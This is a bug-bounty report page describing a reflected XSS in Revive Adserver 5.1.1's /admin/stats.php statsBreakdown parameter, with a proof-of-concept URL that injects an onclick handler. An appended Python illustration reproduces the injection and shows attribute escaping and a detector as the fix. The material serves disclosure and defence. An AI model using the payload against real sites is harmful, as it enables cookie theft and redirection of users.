hackerone / solov9ev / H1:1097217
History: Feb 06, 2021 - 3:07 p.m.

Revive Adserver: Reflected XSS on /admin/stats.php

2021-02-06 15:07:34
solov9ev
hackerone.com
67
Tags: revive adserver, xss, reflected, stats.php, vulnerability, cookies stealing, malicious website redirection

EPSS: 0.001 (Percentile: 41.9%)

Linked to the report https://hackerone.com/reports/1083376
I found a reflected XSS attack on /admin/stats.php.

Revive-Adserver version is revive-adserver-5.1.1.

This time I found the parameter statsBreakdown.

  • Go to http://revive-adserver.loc/admin/stats.php?statsBreakdown=day%27%20onclick=alert(document.domain)%20accesskey=X%20&listorder=key&orderdirection=up&day=&setPerPage=15&entity=global&breakdown=history&period_preset=last_month&period_start=01+December+2020&period_end=31+December+2020

  • For the payload to be executed, the user needs to press the access key combination for the hidden input field (for Firefox, Alt+Shift+X, see this for other browsers).

{F1186275}

Impact

With this vulnerability, an attacker can, for example, steal users' cookies or redirect users to a malicious website.
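An added illustration, not part of the report and not Revive Adserver's own code: the attribute-injection shape the report describes (a single quote closing the `value` attribute of the hidden input, after which `onclick` and `accesskey` land as new attributes) beside the attribute-context output encoding that neutralises it. The template string is an assumed shape of the affected markup, since the page does not show Revive's template; the function names and the `EXPECTED_ATTRS` set are hypothetical. The check parses the rendered tag the way a browser would and reports any attribute the field was not meant to carry.

```python
import html
from html.parser import HTMLParser

# Constructed value, URL-decoded from the statsBreakdown parameter in the report:
# the leading quote closes the attribute and the rest becomes new attributes.
PAYLOAD = "day' onclick=alert(document.domain) accesskey=X "

# Attributes the hidden field is supposed to carry (assumed; hypothetical template).
EXPECTED_ATTRS = {"type", "name", "value"}


def render_hidden_unsafe(stats_breakdown: str) -> str:
    """Vulnerable pattern: the request value is interpolated into a single-quoted
    attribute with no output encoding (assumed shape of the affected markup)."""
    return (
        "<input type='hidden' name='statsBreakdown' "
        f"value='{stats_breakdown}'>"
    )


def render_hidden_safe(stats_breakdown: str) -> str:
    """Hardened form: encode for the HTML attribute context. quote=True makes
    html.escape encode both ' and ", so the value can no longer close the attribute."""
    return (
        "<input type='hidden' name='statsBreakdown' "
        f"value='{html.escape(stats_breakdown, quote=True)}'>"
    )


class _InputAttrCollector(HTMLParser):
    """Collect the attributes of the first <input> tag, as a browser would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}
        self._seen = False

    def handle_starttag(self, tag, attrs):
        if tag == "input" and not self._seen:
            self._seen = True
            self.attrs = dict(attrs)


def input_attributes(markup: str) -> dict:
    """Return the parsed attributes (values already entity-decoded) of the input tag."""
    parser = _InputAttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def injected_attributes(markup: str) -> set:
    """Attribute names the rendered tag carries beyond the expected ones.
    A non-empty result means untrusted data broke out of the value attribute."""
    return set(input_attributes(markup)) - EXPECTED_ATTRS


if __name__ == "__main__":
    for label, render in (("unsafe", render_hidden_unsafe), ("safe", render_hidden_safe)):
        markup = render(PAYLOAD)
        print(f"{label}: {markup}")
        print(f"  injected attributes: {sorted(injected_attributes(markup)) or 'none'}")
```

Running it shows the unsafe rendering carrying an `onclick` attribute while the hardened rendering keeps the whole payload inside `value` as inert text. The same check applies to any template that places request data inside an attribute: encode for the attribute context (both quote characters included), and never rely on single quotes alone to delimit the value.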

